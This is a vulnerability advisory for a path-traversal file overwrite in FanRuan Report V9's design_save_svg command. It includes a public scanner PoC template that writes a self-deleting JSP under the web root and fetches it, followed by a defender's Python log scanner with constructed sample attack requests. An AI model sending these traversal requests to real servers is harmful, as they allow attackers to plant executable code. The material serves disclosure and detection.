fanruan-oa-v9-designsavevg-upload-file: FanRuan Report V9 design_save_svg arbitrary file overwrite / file upload

Date: 2025-09-01 | Affected software: FanRuan Report V9 | PoC: public

Vulnerability description

FanRuan Report V9 contains an arbitrary file overwrite: the design_save_svg command of the svginit operation in /WebReport/ReportServer writes the request body to the location given by the filePath parameter, and that parameter is not confined to the chartmapsvg directory, so "../" sequences let an attacker write a file of their choosing (for example a JSP) under the web root. This is equivalent to arbitrary file upload.

PoC code [public]

id: fanruan-oa-v9-designsavevg-upload-file

info:
  name: 帆软报表 V9 design_save_svg 任意文件覆盖文件上传
  author: zan8in
  severity: critical
  description: |
    帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20V9%20design_save_svg%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E7%9B%96%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html
  
set:
  rand1: randomLowercase(12)
  r2: randomInt(100,999)
  r3: randomInt(100,999)
rules:
  r0:
    request:
      method: POST
      path: /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp
      headers:
        Content-Type: text/xml;charset=UTF-8
      body: |
        {"__CONTENT__":"<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>","__CHARSET__":"UTF-8"}
    expression: response.status == 200 
  r1:
    request:
      method: GET
      path: /WebReport/update.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(string(r2*r3)))
expression: r0() && r1()
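The following is an added detection example from the defender's side; it is not part of the original advisory or of the afrog template above. It scans web-server access-log lines (in combined log format) for requests to /WebReport/ReportServer with cmd=design_save_svg whose filePath escapes its directory with "..", including percent-encoded and double-encoded forms, and separately notes when the target file name ends in .jsp. The sample log lines, client addresses and timestamps are constructed for the example.

```python
"""
Detection helper for the FanRuan Report V9 design_save_svg traversal pattern.

Flags access-log lines where /WebReport/ReportServer is called with
cmd=design_save_svg and a filePath that escapes its directory via "..".
The sample log lines at the bottom are constructed for this example.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request field of a combined-log-format line: "METHOD /path?query HTTP/x.y"
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_traversal(file_path: str) -> bool:
    """True if file_path contains a '..' segment after repeated URL-decoding,
    or normalises to a location above the directory it starts in."""
    decoded = file_path
    for _ in range(3):  # collapse double-encoding such as %252e%252e
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("\\", "/")
    if ".." in decoded.split("/"):
        return True
    normalised = posixpath.normpath(decoded)
    return normalised == ".." or normalised.startswith("../")


def classify(line: str):
    """Return a dict describing a design_save_svg request, or None if the
    line is not such a request."""
    m = _REQ_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != "/WebReport/ReportServer":
        return None
    qs = parse_qs(parts.query)  # decodes one layer of percent-encoding
    if qs.get("cmd", [""])[0] != "design_save_svg":
        return None
    file_path = qs.get("filePath", [""])[0]
    return {
        "method": m.group("method"),
        "file_path": file_path,
        "traversal": is_traversal(file_path),
        "writes_jsp": unquote(file_path).lower().endswith(".jsp"),
    }


def scan(lines):
    """Return the suspicious design_save_svg requests found in lines."""
    hits = []
    for line in lines:
        info = classify(line)
        if info and (info["traversal"] or info["writes_jsp"]):
            hits.append(info)
    return hits


# Constructed sample: one benign save, two traversal attempts (plain and
# double-encoded), and the follow-up GET that the PoC issues.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Sep/2025:10:00:01 +0800] "POST /WebReport/ReportServer'
    '?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/map1.svg HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Sep/2025:10:00:02 +0800] "POST /WebReport/ReportServer'
    '?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Sep/2025:10:00:03 +0800] "POST /WebReport/ReportServer'
    '?op=svginit&cmd=design_save_svg&filePath=chartmapsvg%2F%252e%252e%2F%252e%252e%2Fx.jsp HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Sep/2025:10:00:04 +0800] "GET /WebReport/update.jsp HTTP/1.1" 200 6',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A patched or mitigated server should reject any filePath that does not normalise to a location inside chartmapsvg; the checker above applies the same normalisation to logged requests so that attempts hidden behind percent-encoding are not missed, and a follow-up GET to a newly created .jsp from the same client is the natural second signal to correlate.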
